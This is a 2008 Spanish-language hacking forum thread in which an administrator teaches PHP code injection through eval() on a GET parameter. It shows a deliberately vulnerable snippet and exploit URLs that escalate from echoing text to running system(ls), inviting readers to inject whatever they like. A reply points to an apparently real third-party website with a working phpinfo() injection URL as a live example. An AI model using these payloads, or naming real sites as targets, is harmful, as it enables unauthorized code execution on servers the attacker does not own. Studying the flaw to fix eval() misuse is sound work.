vZack
Noviembre 19, 2008, 05:19:09 pm *
Bienvenido(a), Visitante. Favor de ingresar o registrarse.

Ingresar con nombre de usuario, contraseña y duración de la sesión
Noticias: Registrate para ver todos los foros
 
   Inicio   Ayuda Ingresar Registrarse  
Páginas: [1]   Ir Abajo
  Imprimir  
Autor Tema: PHP Injection  (Leído 746 veces)
vZor
Administrator
Dios del caos
******
Desconectado Desconectado

Sexo: Masculino
Mensajes: 223



« en: Agosto 19, 2008, 04:07:06 pm »

PHP Injection

¿De Que se trata?
Se trata de un bug que nos permite ejecutar codigo php dentro de un script que use la funcion eval() junto algun parametro que pueda ser modificado por el usuario.


Ejemplo de codigo vulnerable
Código:
<?php
$var
=$_GET['var'];
eval(
'$juaz = '.$var.';');
?>


Explicacion / Como explotarlo

Supongamos que tenemos el codigo anterior, para inyectar nuestro code primero tenemos que terminar la expresion anterior para que no nos tire error.
Código:
http://pagina.com/vuln.php?var=1

Ahora inyectaremos nuestro code Tongue, para ello le añadimos ';' a la expresion anterior mas nuestro code
Código:
http://pagina.com/vuln.php?var=1;echo juanked

Y si todo va bien vemos que nos sale un 'juanked' Cheesy

Si la config de php lo permite podemos ejecutar comandos
Código:
http://pagina.com/vuln.php?var=1;system(ls)

E inyectar lo que nos plazca xD

Esto es todo. Salu2
En línea

vZer
Administrator
Dios del caos
******
Desconectado Desconectado

Sexo: Masculino
Mensajes: 279


WWW
« Respuesta #1 en: Agosto 19, 2008, 05:19:04 pm »

ya no hay paginas que usen ese "método" para pillar la variable.
En línea

vZor
Administrator
Dios del caos
******
Desconectado Desconectado

Sexo: Masculino
Mensajes: 223



« Respuesta #2 en: Agosto 19, 2008, 06:00:36 pm »

Todavia hay webs viejas que tienen php injection


Vease
Código:
http://www.xbomber.co.uk/taggerLE/tags.php?foo=%22.phpinfo().%22
En línea

vZer
Administrator
Dios del caos
******
Desconectado Desconectado

Sexo: Masculino
Mensajes: 279


WWW
« Respuesta #3 en: Agosto 19, 2008, 06:02:26 pm »

Todavia hay webs viejas que tienen php injection


Vease
Código:
http://www.xbomber.co.uk/taggerLE/tags.php?foo=%22.phpinfo().%22

pocas...
En línea

Rawr
Desastre natural
**
Desconectado Desconectado

Mensajes: 6


« Respuesta #4 en: Octubre 12, 2008, 08:46:46 am »

Bonito codigo, lastima que nos e usarlos xd
En línea
Páginas: [1]   Ir Arriba
  Imprimir  
 
Ir a:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.1 | SMF © 2006-2008, Simple Machines LLC XHTML 1.0 válido! CSS válido!